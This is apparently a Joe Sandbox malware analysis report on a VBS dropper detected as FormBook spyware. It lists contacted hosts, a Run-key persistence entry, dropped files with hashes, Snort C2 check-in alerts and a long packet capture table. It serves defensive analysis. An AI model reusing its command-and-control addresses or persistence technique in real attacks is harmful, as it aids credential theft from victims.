http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.493569839.000002C002DA1000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
52.20.84.62	www.nichevesting.com	United States	14618	AMAZON-AESUS	false
208.109.43.28	bestservicesandtrade.org	United States	30148	SUCURI-SECUS	false
142.250.203.110	drive.google.com	United States	15169	GOOGLEUS	false
34.117.168.233	td-ccm-168-233.wixdns.net	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
183.181.84.3	www.star-house.okinawa	Japan	2519	VECTANTARTERIANetworksCorporationJP	false
104.21.67.180	www.xn--lst4d-fwa.site	United States	13335	CLOUDFLARENETUS	false
66.235.200.145	shivanshnegi.com	United States	13335	CLOUDFLARENETUS	false
49.212.180.95	denko-kosan.com	Japan	9371	SAKURA-CSAKURAInternetIncJP	false
172.217.168.65	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
172.96.191.163	bebas88official.click	Canada	59253	LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG	false
162.0.236.127	www.deepee.xyz	Canada	22612	NAMECHEAP-NETUS	false
212.227.172.253	www.julesgifts.co.uk	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	818780
Start date and time:	2023-03-02 17:17:07 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	GlobalImagingDocuments9575734549684.vbs
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winVBS@13/6@16/12
EGA Information:	Successful, ratio: 75%
HDC Information:	Successful, ratio: 48.1% (good quality ratio 40.1%) Quality average: 68.5% Quality standard deviation: 35.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 72 Number of non-executed functions: 72
Cookbook Comments:	Found application associated with file extension: .vbs Override analysis time to 240s for JS/VBS files not yet terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 8.238.189.126, 8.238.88.254, 67.26.137.254, 8.248.239.254, 8.248.149.254
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, ocos-office365-s2s.msedge.net, client-office365-tas.msedge.net, ctldl.windowsupdate.com, cdn.onenote.net, config.edge.skype.com, wu-bg-shim.trafficmanager.net
Execution Graph export aborted for target powershell.exe, PID 5496 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:18:06	API Interceptor	1x Sleep call for process: wscript.exe modified
17:20:00	API Interceptor	985x Sleep call for process: explorer.exe modified
17:20:03	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LLXTPL6 C:\Program Files (x86)\internet explorer\ieinstal.exe
17:20:13	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LLXTPL6 C:\Program Files (x86)\internet explorer\ieinstal.exe

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 62582 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	62582
Entropy (8bit):	7.996063107774368
Encrypted:	true
SSDEEP:	1536:Jk3XPi43VgGp0gB2itudTSRAn/TWTdWftu:CHa43V5p022iZ4CgA
MD5:	E71C8443AE0BC2E282C73FAEAD0A6DD3
SHA1:	0C110C1B01E68EDFACAEAE64781A37B1995FA94B
SHA-256:	95B0A5ACC5BF70D3ABDFD091D0C9F9063AA4FDE65BD34DBF16786082E1992E72
SHA-512:	B38458C7FA2825AFB72794F374827403D5946B1132E136A0CE075DFD351277CF7D957C88DC8A1E4ADC3BCAE1FA8010DAE3831E268E910D517691DE24326391A6
Malicious:	false
Reputation:	unknown
Preview:	MSCF....v.......,...................I.................BVrl .authroot.stl....oJ5..CK..8U....a..3.1.P. J.".t..2F2e.dHH......$E.KB.2D..-SJE....^..'..y.}..,{m.....\...]4.G.......h....148...e.gr.....48:.L...g.....Xef.x:..t...J...6-....kW6Z>....&......ye.U.Q&z:.vZ..._....a...]..T.E.....B.h.,...[....V.O.3..EW.x.?.Q..$.@.W..=.B.f..8a.Y.JK..g./%p..C.4CD.s..Jd.u..@.g=...a.. .h%..'.xjy7.E..\.....A..':.4TdW?Ko3$.Hg.z.d~....../q..C.....`...A[ W(.........9...GZ.;....l&?........F...p?... .p.....{S.L4..v.+...7.T?.....p..`..&..9.......f...0+.L.....1.2b)..vX5L'.~....2vz.,E.Ni.{#...o..w.?.#.3..h.v<.S%.].tD@!Le.w.q.7.8....QW.FT.....hE.........Y............./.%Q...k....Y.n..v.A..../...>B..5\..-Ko.......O<.b.K.{.O.b...._.7...4.;%9N..K.X>......kg-9..r.c.g.G\|.[.-...HT...",?.q...ad....7RE.......!f..#../....?.-.^.K.c^...+{.g......]<..$.=.O....ii7.wJ+S..Z..d.....>..J*...T..Q7..`.r,<$....\d:K`..T.n....N.....C..j.;.1SX..j....1...R....+....Yg....]....3..9..S..D..`.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.105348854698867
Encrypted:	false
SSDEEP:	6:kKljry/7UN+SkQlPlEGYRMY9z+4KlDA3RUecZUt:1CvkPlE99SNxAhUext
MD5:	DA7524221A3DE41554C40350D91DCD23
SHA1:	1FE35630356F72ECE6F9161FB9BBDAFDD351A27E
SHA-256:	8C6826EA1B4E7BA8E4844C447B9D413182892B3FD505BD4BF5F5DA65F0CC5B53
SHA-512:	CB82740DCBBB5B469030100CDEA72AD1D971BB3BCA4B56DA1BC5837BF5D736D680D441A0BEECC6C5F30EB509B4176F9560B527C8A41471FA01F05F951FA26023
Malicious:	false
Reputation:	unknown
Preview:	p...... ........3L(.nM..(....................................................... ..........).K......&...........v...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.2.f.9.2.9.a.7.4.b.d.9.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.9260988789684415
Encrypted:	false
SSDEEP:	3:Nlllulb/lj:NllUb/l
MD5:	13AF6BE1CB30E2FB779EA728EE0A6D67
SHA1:	F33581AC2C60B1F02C978D14DC220DCE57CC9562
SHA-256:	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
SHA-512:	1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
Malicious:	false
Reputation:	unknown
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\3EYH853QC6

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2891393435168748
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
MD5:	037D23498B81732EEAAAD0E8015F3F85
SHA1:	E7719865D7717A4B36D85609F3EC25C10934587F
SHA-256:	83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
SHA-512:	BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3n1ndkyb.v12.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_suqe02n1.jxp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

Static File Info

General

File type:	ASCII text, with very long lines (331), with CRLF line terminators
Entropy (8bit):	5.959217685419006
TrID:
File name:	GlobalImagingDocuments9575734549684.vbs
File size:	40103
MD5:	83757abb407e9fad9631f484734a2c4d
SHA1:	987754ccf4ac6eab8bfc10e00b5b052f06678dee
SHA256:	e978e28e11646ee2e668a52c7bd14978d22e4361a6a363e74b43fb10c3634c7c
SHA512:	567300e40d06e199eb814f24f4758afbf6a46b3ac85797ea7829fff54b7a97d07e69b330700824f80a1c3bb1e8787b4450b485eaedd6097fd19738ea9d9f2186
SSDEEP:	768:lDzkyEWsWPEt58cyMC+fMzFfS/u0qqW/REYmzEdo:Fz/sPGcJgzFAq55KT
TLSH:	A8035B944E0B2648129B7BFB999E4679C0A504FB81A11438ADCCF3BC5E0575C3EBF64B
File Content Preview:	....'Indbytning Limenes Formality Liquidization perigon Snedkte Guln Omskoledes ....'kreditere Fradragsret Lydkort subexpressions Attachable Indflettede Arterieforkalkningerne Culturable Tykstegsfiletters ......Molecularistrevaccinati = Molecularistrevacc

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.6162.0.236.12749741802031449 03/02/23-17:20:59.247155	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49741	80	192.168.2.6	162.0.236.127
192.168.2.6162.0.236.12749741802031453 03/02/23-17:20:59.247155	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49741	80	192.168.2.6	162.0.236.127
192.168.2.6162.0.236.12749741802031412 03/02/23-17:20:59.247155	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49741	80	192.168.2.6	162.0.236.127

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 2, 2023 17:18:24.267296076 CET	49712	443	192.168.2.6	142.250.203.110
Mar 2, 2023 17:18:24.267339945 CET	443	49712	142.250.203.110	192.168.2.6
Mar 2, 2023 17:18:24.267472029 CET	49712	443	192.168.2.6	142.250.203.110
Mar 2, 2023 17:18:24.273303986 CET	49712	443	192.168.2.6	142.250.203.110
Mar 2, 2023 17:18:24.273330927 CET	443	49712	142.250.203.110	192.168.2.6
Mar 2, 2023 17:18:24.340022087 CET	443	49712	142.250.203.110	192.168.2.6
Mar 2, 2023 17:18:24.340253115 CET	49712	443	192.168.2.6	142.250.203.110
Mar 2, 2023 17:18:24.340970993 CET	443	49712	142.250.203.110	192.168.2.6
Mar 2, 2023 17:18:24.341093063 CET	49712	443	192.168.2.6	142.250.203.110
Mar 2, 2023 17:18:24.344793081 CET	49712	443	192.168.2.6	142.250.203.110
Mar 2, 2023 17:18:24.344815016 CET	443	49712	142.250.203.110	192.168.2.6
Mar 2, 2023 17:18:24.345300913 CET	443	49712	142.250.203.110	192.168.2.6
Mar 2, 2023 17:18:24.358906031 CET	49712	443	192.168.2.6	142.250.203.110
Mar 2, 2023 17:18:24.358961105 CET	443	49712	142.250.203.110	192.168.2.6
Mar 2, 2023 17:18:24.855353117 CET	443	49712	142.250.203.110	192.168.2.6
Mar 2, 2023 17:18:24.855501890 CET	443	49712	142.250.203.110	192.168.2.6
Mar 2, 2023 17:18:24.855736971 CET	49712	443	192.168.2.6	142.250.203.110
Mar 2, 2023 17:18:24.856271982 CET	49712	443	192.168.2.6	142.250.203.110
Mar 2, 2023 17:18:24.956888914 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:24.956928968 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:24.957025051 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:24.957480907 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:24.957498074 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.021131039 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.021291018 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.022758007 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.022867918 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.030448914 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.030464888 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.031193018 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.033567905 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.033590078 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.251400948 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.251494884 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.253169060 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.253261089 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.255530119 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.255613089 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.256700993 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.256783009 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.256803036 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.258228064 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.258270025 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.258296967 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.258310080 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.258349895 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.268033028 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.268467903 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.268505096 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.268542051 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.268556118 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.268606901 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.269665956 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.270900011 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.270937920 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.270955086 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.270967007 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.271017075 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.272094965 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.273308992 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.273377895 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.273397923 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.274462938 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.274511099 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.274521112 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.275676012 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.275738955 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.275749922 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.276820898 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.276880980 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.276890993 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.277882099 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.277990103 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.278003931 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.278968096 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.279022932 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.279036045 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.279990911 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.280040979 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.280050993 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.281075001 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.281152964 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.281162977 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.282088995 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.282155991 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.282165051 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.283163071 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.283216000 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.283225060 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.284200907 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.284265041 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.284275055 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.285248995 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.285321951 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.285331011 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.285907030 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.285980940 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.285993099 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.306183100 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.306245089 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.306288004 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.306308985 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.306333065 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.306365013 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.306379080 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.306417942 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.306427956 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.306473017 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.306514025 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.306523085 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.306534052 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.306571960 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.306577921 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.306618929 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.306658030 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.306658030 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.306674957 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.306710005 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.306725025 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.306818008 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.306857109 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.306864977 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.306906939 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.306946039 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.306947947 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.306962013 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307007074 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.307018995 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307091951 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307133913 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307133913 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.307148933 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307188034 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.307197094 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307249069 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307288885 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.307296991 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307311058 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307348013 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.307357073 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307434082 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307476997 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307480097 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.307492018 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307528019 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.307537079 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307585001 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307626009 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.307636023 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307650089 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307693958 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.307703018 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307749033 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307790995 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.307791948 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307806969 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307842970 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.307852030 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307924986 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307966948 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.307979107 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.307993889 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.308038950 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.308056116 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.308064938 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.308108091 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.308116913 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.308167934 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.308209896 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.308213949 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.308227062 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.308259964 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.308267117 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.308326006 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.308367014 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.308370113 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.308386087 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.308422089 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.308432102 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.308501959 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.308540106 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.308542013 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.308553934 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.308585882 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.308597088 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.308676958 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.308716059 CET	49714	443	192.168.2.6	172.217.168.65
Mar 2, 2023 17:18:25.308717966 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.308732033 CET	443	49714	172.217.168.65	192.168.2.6
Mar 2, 2023 17:18:25.308763981 CET	49714	443	192.168.2.6	172.217.168.65
